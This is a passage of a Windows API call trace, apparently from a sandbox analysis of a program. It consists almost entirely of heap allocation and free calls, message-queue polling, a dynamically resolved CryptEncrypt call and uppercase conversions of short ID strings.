dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0264.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0264.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0264.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0264.794] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0264.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0264.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0264.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0264.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0264.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd) returned 0x24aa1d0 [0264.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa1d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0264.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.797] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0264.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0264.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6a08 [0264.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0264.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0264.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0264.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2170 [0264.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0264.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0264.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0264.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0264.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2170 | out: hHeap=0x25c0000) returned 1 [0264.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0264.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2190 | out: hHeap=0x25c0000) returned 1 [0264.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0264.798] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34a20a0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x34a20a0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0264.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0264.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0264.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0264.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0264.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0264.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0264.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0264.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0264.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0264.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0264.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0264.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0264.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0264.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0264.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0264.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0264.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0264.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2180 | out: hHeap=0x25c0000) returned 1 [0264.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0264.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0264.800] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0264.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0264.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0264.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0264.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0264.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0264.800] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.800] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0264.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0264.800] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0264.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0264.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0264.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.801] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.801] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0264.801] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.801] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0264.801] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0264.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0264.802] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0264.802] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.802] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0264.802] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0264.802] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0264.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.802] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0264.802] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.802] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0264.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0264.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0264.803] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0264.803] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0264.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.803] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.803] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.803] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.803] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.803] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0264.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0264.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0264.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0264.804] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.804] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0264.804] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0264.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.804] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.804] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.804] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0264.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.805] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0264.805] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0264.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0264.806] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0264.806] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0264.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.806] RtlAllocateHeap 